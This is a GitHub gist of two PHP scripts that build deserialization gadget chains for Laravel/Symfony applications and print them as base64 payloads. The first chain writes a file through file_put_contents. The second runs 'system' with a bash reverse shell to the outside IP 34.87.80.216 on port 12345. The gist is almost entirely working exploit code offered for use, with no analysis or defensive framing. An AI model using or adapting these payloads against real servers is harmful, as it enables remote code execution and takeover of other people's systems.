-
-
Save ducnhse130201/f11cc01a945e6fb40ba5fbb88ed8b459 to your computer and use it in GitHub Desktop.
chain.php (laravel + symnofy)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| namespace Symfony\Component\Cache\Adapter{ | |
| Class TagAwareAdapter{ | |
| private $deferred = []; | |
| private $pool; | |
| public function __construct(){ | |
| $this->deferred = array("pwn"=>"tmp"); | |
| $this->pool = new \Faker\ValidGenerator(); | |
| } | |
| } | |
| } | |
| namespace Faker{ | |
| class Generator | |
| { | |
| function __construct($form) | |
| { | |
| $this->formatters = $form; | |
| } | |
| } | |
| class ValidGenerator | |
| { | |
| protected $generator; | |
| protected $validator; | |
| protected $maxRetries; | |
| public function __construct() | |
| { | |
| $si = new \PHPUnit\Framework\MockObject\Invocation\StaticInvocation(); | |
| $g1 = new \Faker\Generator(array('tmp' => $si )); | |
| $g2 = new \Faker\Generator(array("saveDeferred" => array($g1, "getFormatter"))); | |
| $rc = new \PHPUnit\Framework\MockObject\Stub\ReturnCallback("file_put_contents"); | |
| $this->generator = $g2; | |
| $this->validator = array($rc, "invoke"); | |
| $this->maxRetries = 10; | |
| } | |
| } | |
| } | |
| namespace PHPUnit\Framework\MockObject\Stub{ | |
| class ReturnCallback{ | |
| public function __construct($callback) | |
| { | |
| $this->callback = $callback; | |
| } | |
| } | |
| } | |
| namespace PHPUnit\Framework\MockObject\Invocation{ | |
| class StaticInvocation{ | |
| function __construct() | |
| { | |
| $this->parameters = array('/tmp/test','pwn'); | |
| } | |
| } | |
| } | |
| namespace{ | |
| $exp = new Symfony\Component\Cache\Adapter\TagAwareAdapter(); | |
| echo base64_encode(serialize($exp)); | |
| } | |
| ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| namespace Symfony\Component\Cache\Adapter{ | |
| Class TagAwareAdapter{ | |
| private $deferred = []; | |
| private $pool; | |
| public function __construct($deferred,$pool){ | |
| $this->deferred = $deferred; | |
| $this->pool = $pool; | |
| } | |
| } | |
| class ProxyAdapter{ | |
| private $setInnerItem; | |
| private $poolHash; | |
| public function __construct($setInnerItem,$poolHash){ | |
| $this->setInnerItem = $setInnerItem; | |
| $this->poolHash = $poolHash; | |
| } | |
| } | |
| } | |
| namespace Symfony\Component\Cache{ | |
| class CacheItem{ | |
| protected $innerItem; | |
| protected $expiry; | |
| protected $poolHash; | |
| protected $defaultLifetime; | |
| public function __construct($innerItem,$expiry,$poolHash,$defaultLifetime){ | |
| $this->innerItem = $innerItem; | |
| $this->expiry = $expiry; | |
| $this->poolHash = $poolHash; | |
| $this->defaultLifetime = $defaultLifetime; | |
| } | |
| } | |
| } | |
| # ($this->setInnerItem)($innerItem, $item); | |
| # system(cmd,ret) | |
| namespace{ | |
| $pa = new Symfony\Component\Cache\Adapter\ProxyAdapter("system",1); | |
| $ci = new Symfony\Component\Cache\CacheItem("bash -c 'bash -i >& /dev/tcp/34.87.80.216/12345 0>&1'",1337,1,13337); | |
| $taa = new Symfony\Component\Cache\Adapter\TagAwareAdapter(array('pwn'=>$ci), $pa); | |
| echo base64_encode(serialize($taa)); | |
| } | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment